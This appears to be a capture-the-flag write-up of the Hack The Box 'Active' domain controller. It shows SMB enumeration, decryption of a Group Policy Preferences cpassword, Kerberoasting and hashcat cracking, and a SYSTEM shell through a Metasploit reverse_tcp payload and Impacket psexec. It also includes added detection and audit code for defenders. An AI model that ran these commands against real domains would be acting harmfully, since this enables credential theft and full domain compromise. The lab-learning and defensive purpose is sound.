I had so much fun with this recently retired box. My skill set with Active Directory was lacking, so this was quite a learning experience!

Enumeration

Nmap baby, Nmap:

nmap -sC -sV -p- -oA initial 10.10.10.100
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-02 18:13 UTC
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  tcpwrapped
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  tcpwrapped
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc        Microsoft Windows RPC
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
49169/tcp open  msrpc        Microsoft Windows RPC
49172/tcp open  msrpc        Microsoft Windows RPC
49182/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1m18s, deviation: 0s, median: -1m18s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2018-08-02 18:13:42
|_  start_date: 2018-08-02 09:21:01

Wow, that's a lot of ports. From the initial scan we can safely say that we are dealing with a Windows machine, and a domain controller at that (DNS, LDAP on 389/3268, Kerberos on 88). A couple of ports stand out: DNS (53), SMB (445) and RPC (all over the place). I initially ran enum4linux on the box to explore the SMB shares, but found the smbmap tool while writing this post, which gives a much clearer view of the situation:

smbmap -H 10.10.10.100
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.100...
[+] IP: 10.10.10.100:445	Name: 10.10.10.100
	Disk          Permissions
	----          -----------
	ADMIN$        NO ACCESS
	C$            NO ACCESS
	IPC$          NO ACCESS
	NETLOGON      NO ACCESS
	Replication   READ ONLY
	SYSVOL        NO ACCESS
	Users         NO ACCESS

Let's fire up smbclient to access the Replication share. Just press enter at the password prompt to log in anonymously.

smbclient //10.10.10.100/Replication
Unable to initialize messaging context
Enter WORKGROUP\user's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \>

Cool, that worked. Instead of walking through all the directories on this share by hand, I ran smbmap again, this time with the -R argument to list the directories recursively. See what I found:

smbmap -H 10.10.10.100 -R
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.100...
[+] IP: 10.10.10.100:445	Name: 10.10.10.100
	Disk          Permissions
	----          -----------
	ADMIN$        NO ACCESS
	C$            NO ACCESS
	IPC$          NO ACCESS
	NETLOGON      NO ACCESS
	Replication   READ ONLY
	.\
	dr--r--r--                0 Sat Jul 21 10:37:44 2018	.
	dr--r--r--                0 Sat Jul 21 10:37:44 2018	..
	dr--r--r--                0 Sat Jul 21 10:37:44 2018	active.htb
	*** Snip***
	.\\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\
	dr--r--r--                0 Sat Jul 21 10:37:44 2018	.
	dr--r--r--                0 Sat Jul 21 10:37:44 2018	..
	-r--r--r--              533 Sat Jul 21 10:38:11 2018	Groups.xml

Ah, the infamous Groups.xml. From this excellent blog post:

Group policy preferences allow domain admins to create and deploy local user and local administrator accounts across the domain. This feature was introduced in Windows 2008 Server; however, it can be abused by an attacker since the credentials of these accounts are stored encrypted and the public key is published by Microsoft. This leaves the door open to any user to retrieve these files and decrypt the passwords stored in order to elevate access.

These files are stored in a shared directory in the domain controller and any authenticated user in the domain has read access to these files since it is needed in order to obtain group policy updates.

The contents of Groups.xml is the following:

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
  </User>
</Groups>

So we see three key values here:

- The domain (active.htb)
- The username (SVC_TGS)
- The actual value (cpassword)

The stored value can be decrypted using either a Metasploit module, a PowerSploit module, or the tool I used, Gpprefdecrypt.py. I've edited the hash and password a bit to prevent the usual Google-fu.

python Gpprefdecrypt.py [e]dBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
[G]PPstillStandingStrong2k18
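The same weakness seen from the defender's side: a SYSVOL audit that reports every Group Policy Preference file still carrying a cpassword attribute, so the account can be found, the file removed and the password rotated. Microsoft's 2014 fix stops new cpassword values from being written but leaves existing files in place, which is why old domains still have them. This is an added example written for this post, not the author's Gpprefdecrypt.py or any Microsoft tool; it only locates the attribute and never decrypts it. The two sample Groups.xml files, the account names inside them and the temporary directory layout are constructed.

```python
"""
Audit a SYSVOL copy (or a mounted Replication/SYSVOL share) for Group
Policy Preference XML files that still carry a cpassword attribute.
Added example; reports only, never decrypts.
"""
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP file names that are known to embed account credentials.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}


def find_cpasswords(sysvol_root):
    """Walk sysvol_root and return one dict per element that has a
    cpassword attribute: relative file path, account name, value length."""
    hits = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for name in files:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue  # malformed or non-XML file: skip, do not crash
            for elem in tree.iter():
                cpw = elem.get("cpassword")
                if cpw is None:
                    continue
                # Groups.xml keeps the account on the Properties element as
                # userName; the other file types use runAs/accountName.
                account = (elem.get("userName") or elem.get("runAs")
                           or elem.get("accountName") or "?")
                hits.append({"file": os.path.relpath(path, sysvol_root),
                             "account": account,
                             "cpassword_len": len(cpw)})
    return hits


# Constructed sample: one policy with an embedded credential, one without.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="example.local\\svc_backup" image="2">
    <Properties action="U" userName="example.local\\svc_backup"
                cpassword="CONSTRUCTED_CPASSWORD_VALUE_NOT_A_REAL_SECRET"/>
  </User>
</Groups>
"""
SAMPLE_CLEAN_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Guest" image="2">
    <Properties action="U" userName="Guest" acctDisabled="1"/>
  </User>
</Groups>
"""


def build_sample_sysvol():
    """Write the constructed files into a temp dir laid out like
    SYSVOL\\<domain>\\Policies\\{GUID}\\MACHINE\\Preferences\\Groups\\."""
    root = tempfile.mkdtemp(prefix="sysvol_")
    for guid, xml in (("{31B2F340-016D-11D2-945F-00C04FB984F9}", SAMPLE_GROUPS_XML),
                      ("{6AC1786C-016F-11D2-945F-00C04fB984F9}", SAMPLE_CLEAN_XML)):
        d = os.path.join(root, "example.local", "Policies", guid,
                         "MACHINE", "Preferences", "Groups")
        os.makedirs(d)
        with open(os.path.join(d, "Groups.xml"), "w", encoding="utf-8") as f:
            f.write(xml)
    return root


if __name__ == "__main__":
    for hit in find_cpasswords(build_sample_sysvol()):
        print(f"cpassword present in {hit['file']} for account {hit['account']}")
```

Point it at a real copy of SYSVOL by calling find_cpasswords() with that path instead of the constructed tree; the file-name filter keeps the walk cheap even on large policy stores.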

Exploitation

I switched to the Impacket toolset, based on the Kerberoasting posts I found, as noted on the tools page.

python GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet      LastLogon
--------------------  -------------  --------------------------------------------------------  -------------------  -------------------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 19:06:40  2018-07-30 17:17:40

$[k]rb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$93a0a6cf83fa8e765bacccf1ea177432$***Snip***

What we have here is the Kerberos service ticket (TGS) issued for the SPN registered to the Administrator account. Because that ticket is encrypted with a key derived from the Administrator password (RC4-HMAC, the 23 in $krb5tgs$23$), it can be cracked offline, and with the ticket in hand I can start cracking it with Hashcat. I put the hash into a file named administrator_hash.txt, used rockyou.txt as the wordlist and added --force to override some errors I got:

hashcat -m 13100 -a 0 administrator_hash.txt /usr/share/wordlists/rockyou.txt --force
***Cracking***
Output = T[i]cketmaster1968

There we have the administrator password. Nice.
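What the Kerberoasting step above looks like from the domain controller's side, and how to catch it: every service-ticket request is logged as Security event 4769, and a successful request for a ticket encrypted with RC4-HMAC (TicketEncryptionType 0x17, the same 23 as in the $krb5tgs$23$ line) for an SPN that belongs to a user account is the classic signal; one client collecting tickets for several such SPNs within minutes is stronger still. This is an added example, not part of the original post or of Impacket or hashcat. The event records are constructed (they reuse the names from the post but were not captured from the box), the field names follow the 4769 event schema, and BURST_WINDOW and BURST_THRESHOLD are assumptions to tune per environment.

```python
"""
Kerberoast detection over Security event 4769 records.
Added example; the records below are constructed, not captured.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17                       # etype 23, what hashcat mode 13100 cracks
BURST_WINDOW = timedelta(minutes=5)   # assumption: tune per environment
BURST_THRESHOLD = 3                   # distinct user-account SPNs from one client

SAMPLE_4769 = [
    # Kerberoast: RC4 ticket for an SPN registered to a user account.
    {"time": "2018-07-30T17:17:40", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "Administrator", "TicketEncryptionType": 0x17,
     "IpAddress": "10.10.14.10", "Status": 0x0},
    # Benign: AES256 ticket for a computer-account SPN.
    {"time": "2018-07-30T17:18:02", "TargetUserName": "DESKTOP01$@ACTIVE.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": 0x12,
     "IpAddress": "10.10.10.55", "Status": 0x0},
    # Benign: a TGT renewal is logged as a ticket for krbtgt.
    {"time": "2018-07-30T17:18:30", "TargetUserName": "jsmith@ACTIVE.HTB",
     "ServiceName": "krbtgt", "TicketEncryptionType": 0x17,
     "IpAddress": "10.10.10.56", "Status": 0x0},
    # The same client as the first record sweeps two more user SPNs.
    {"time": "2018-07-30T17:19:05", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "svc_sql", "TicketEncryptionType": 0x17,
     "IpAddress": "10.10.14.10", "Status": 0x0},
    {"time": "2018-07-30T17:19:06", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "svc_web", "TicketEncryptionType": 0x17,
     "IpAddress": "10.10.14.10", "Status": 0x0},
    # Rejected (0xE, KDC_ERR_ETYPE_NOTSUPP): no ticket issued, nothing to crack.
    {"time": "2018-07-30T17:19:07", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "svc_old", "TicketEncryptionType": 0x17,
     "IpAddress": "10.10.14.10", "Status": 0xE},
]


def is_roastable_request(ev):
    """True for a successfully issued RC4 ticket for a user-account SPN.
    Computer accounts end in '$' and krbtgt is the TGS itself; both are
    excluded because they are not crackable user passwords."""
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"] == RC4_HMAC
            and ev["Status"] == 0x0
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def find_bursts(flagged):
    """Map client IP -> sorted SPN owners for every client that obtained
    tickets for BURST_THRESHOLD or more distinct user SPNs inside BURST_WINDOW."""
    by_ip = defaultdict(list)
    for ev in flagged:
        by_ip[ev["IpAddress"]].append(
            (datetime.fromisoformat(ev["time"]), ev["ServiceName"]))
    bursts = {}
    for ip, reqs in by_ip.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            names = {n for t, n in reqs[i:] if t - t0 <= BURST_WINDOW}
            if len(names) >= BURST_THRESHOLD:
                bursts[ip] = sorted(names)
                break
    return bursts


def detect(events):
    """Run both checks over a list of 4769 records."""
    flagged = [ev for ev in events if is_roastable_request(ev)]
    return {
        "rc4_user_spn_tickets": [(ev["IpAddress"], ev["TargetUserName"],
                                  ev["ServiceName"]) for ev in flagged],
        "bursts": find_bursts(flagged),
    }


if __name__ == "__main__":
    result = detect(SAMPLE_4769)
    for ip, who, svc in result["rc4_user_spn_tickets"]:
        print(f"RC4 service ticket for {svc}'s SPN requested by {who} from {ip}")
    for ip, svcs in result["bursts"].items():
        print(f"burst from {ip}: {len(svcs)} user SPNs within {BURST_WINDOW}: {svcs}")
```

The single-event rule fires on the first record alone, which is exactly the request GetUserSPNs.py made above; the burst rule is what separates a tool sweeping every SPN in the domain from a legitimate client that happens to need one RC4 ticket. The lasting fix is the one the etype hints at: long, rotated passwords on service accounts (or group managed service accounts) and AES-only Kerberos so that mode 13100 has nothing to chew on.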

Privilege escalation

Finally, you can use psexec.py from the Impacket package with the cracked password to log in to the server, or just log in with smbclient as administrator with the cracked password. I opted for the Metasploit module in this case, with a reverse TCP shell:

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting   Required  Description
   ----                  ---------------   --------  -----------
   RHOST                 10.10.10.100      yes       The target address
   RPORT                 445               yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                     no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                    no        The service display name
   SERVICE_NAME                            no        The service name
   SHARE                 ADMIN$            yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                 no        The Windows domain to use for authentication
   SMBPass               Ticketmaster1968  no        The password for the specified username
   SMBUser               Administrator     no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     tun0             yes       The listen address (an interface may be specified)
   LPORT     443              yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

If all goes well, you will get a shell on the box as SYSTEM. Simply go to the Administrator's desktop for the root flag; you can get the user flag from the user's desktop as well.

[*] Started reverse TCP handler on 10.10.14.10:443
[*] 10.10.10.100:445 - Connecting to the server...
[*] 10.10.10.100:445 - Authenticating to 10.10.10.100:445 as user 'Administrator'...
[*] 10.10.10.100:445 - Selecting PowerShell target
[*] 10.10.10.100:445 - Executing the payload...
[+] 10.10.10.100:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 10.10.10.100
[*] Meterpreter session 1 opened (10.10.14.10:443 -> 10.10.10.100:63354) at 2018-12-11 01:55:49 +0000

meterpreter > shell
Process 2000 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Psexec output as well:

/psexec.py -target-ip 10.10.10.100 administrator@active.htb
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies

Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file GtlPZcTM.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service OAuq on 10.10.10.100.....
[*] Starting service OAuq.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

And as always, the Ippsec video on this box.